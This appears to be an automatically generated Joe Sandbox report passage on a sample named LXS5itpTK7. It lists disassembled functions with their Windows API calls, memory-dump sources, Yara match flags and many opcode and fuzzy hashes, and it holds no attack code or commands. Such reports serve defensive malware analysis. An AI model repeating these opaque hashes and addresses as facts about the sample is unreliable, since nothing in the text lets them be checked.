Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 0216BADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 02162141: GetLastError.KERNEL32(?,?,0215A9EC,?,00000000,?,0215CDE6,0213247E,00000000,?,00451F20), ref: 02162145
Part of subcall function 02162141: _free.LIBCMT ref: 02162178
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0216B87A,00000000,00000000,?), ref: 0216BB08

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: c5f5fea1f93246a1b6b37e905f22e1b08e04897d934805143d251ce8ddcfb8e1
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: EFF0F932A881166BDB385A24CC4DBBE7758EB4071DF054469DC05F3144EB74BF21C6D0

Function 0216B8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 02162141: GetLastError.KERNEL32(?,?,0215A9EC,?,00000000,?,0215CDE6,0213247E,00000000,?,00451F20), ref: 02162145
Part of subcall function 02162141: _free.LIBCMT ref: 02162178
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621B9

Part of subcall function 02162141: _free.LIBCMT ref: 021621A0
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0216B900

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction ID: 5b8f1eb1ceb35e2c82321d9a6f5a58eda274b2a8c3c67f2a2572c94c2a00ebb9
Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
Instruction Fuzzy Hash: 00012632A991149BCB14AF34DC48ABE33A9DF05315B0441BAEE02EB281DB355E108B50

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 0216B5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02162141: GetLastError.KERNEL32(?,?,0215A9EC,?,00000000,?,0215CDE6,0213247E,00000000,?,00451F20), ref: 02162145
Part of subcall function 02162141: _free.LIBCMT ref: 02162178
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,00000006,?,02160A1C,?,0216BC4D,02160A1C,?,?,?,?,?,02160A1C,?,?), ref: 0216B61B

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: 0312d66a0682c0e9a9edbbf28cd6181ad2d868847786ffb7b3d2629c28aa84d4
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: BCF022363047041FDB245F39DC84B7A7B91EF8032CF14802CFA05CB640D77199128A44

Function 02165427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0216047A,?,00000004), ref: 0216547A

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: 01941531beec2f9f4ce6aaa6c45910b100966fe5f19b2a2f459c70ea5823deab
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: 57F0C231680218BFDB115F50CC05F6E7B26EF04B02F504155FC0566190DB718930AA99

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 02165034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0215E654: RtlEnterCriticalSection.NTDLL(01CE0DAF), ref: 0215E663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0216506C

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: 3d0b3a511d84ae4f5993f29c2d626fc18867cc237afcf42b4e8f5484c173dbcc
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: FBF0AF32A60300DFE704EF68D805B5C77E1AF05721F104266FA14DB2E1CB798A40CF49

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 0216B4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02162141: GetLastError.KERNEL32(?,?,0215A9EC,?,00000000,?,0215CDE6,0213247E,00000000,?,00451F20), ref: 02162145
Part of subcall function 02162141: _free.LIBCMT ref: 02162178
Part of subcall function 02162141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021621B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,00000006,?,?,0216BCAB,02160A1C,?,?,?,?,?,02160A1C,?,?,?), ref: 0216B520

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: bc293d13deb72fbb3aeb401ed389c718b4320d397155cccdd8e14df562d5c229
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: 36F0203A34020857CB089F3AD80877ABF94EBC1754B0A0059EF0ACB290D3319942C790

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 021408CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,0213FE60), ref: 021408D2

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 021576EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: 604ba85267ec730ae76b1fdd7a33f1daf817f8843508d03b08fffd125f3bcabe
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: 80D1B5721481F38ECB2D4A39847503AFFE26A421A530E47EDECF7CA5C2EB24D556D660

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 02157FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 8e2d749386ab6cc2224fcec78dc62b443bae9da3769d6580ec7b035280406f9e
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: BA914F722490F38EEB2D463E847513EFEE15A422A530B07DEDCF2CA1C5EF2485A5D620

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 02158289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 4d4722c26bbf74fed4b2d8bfaf8d57a292cc3c4a3b5691918a1d4834c11782bf
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: B99120722490F38AEB69467E857813EFFE15A421A530B07EDDCF2CA1C5EF24C595D620

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 02157D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: caa682b71ab78f10f2514d7e2f7c112b688ffa71e35dc78a9cee78750ac29f35
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: E49162722491F38AEB2D863D857653EFEE19A411A131A07DEECF2CB1C1EF24C556D620

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 0215D755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: 890e2dc3f575ec64e61bdd688d69d18d24d7e001cea8110de2dd48232cdee895
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: F8618A716C0734DADA386A6CB8907BE6395DF41B0CF0404E9ED72DF2C0D7599941C756

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 02157A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: c052e174b386ed00b91191121f8363956ef897806db6b992b6537ccf09453fa3
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 348151722484F78AEB6D463E847613EFFE15A421A530A07DEECF2CA1C1EF149256D620

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 021587C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 6248c20b0a87ecf1ec47326f9a6a369603e2378078c8371936b8884d560e848d
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 6A112B772C0072C7D618863ED4B42BBE385EBC522872F52FAD8B24B758D32AD1C5D600

Function 00540083 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483503852.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 7645e282207d1863da98cce64cd5130108fde4f6988fdaa990df841803832cdd
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 8911AC72340100AFDB50DE55DCC5FE677EAFB88324B298065EE08CB356D676E802C760

Function 02130D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_LXS5itpTK7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 960014300b2d30d890b4ae01b3da0a23d255d18ceb4a23cca36f7ba25e6d94a1
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 2E01D676B506048FDF22CF24C814BAA33F6FF8A216F5544B9D90AD7381E774A941CB90

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.4483304225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LXS5itpTK7.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
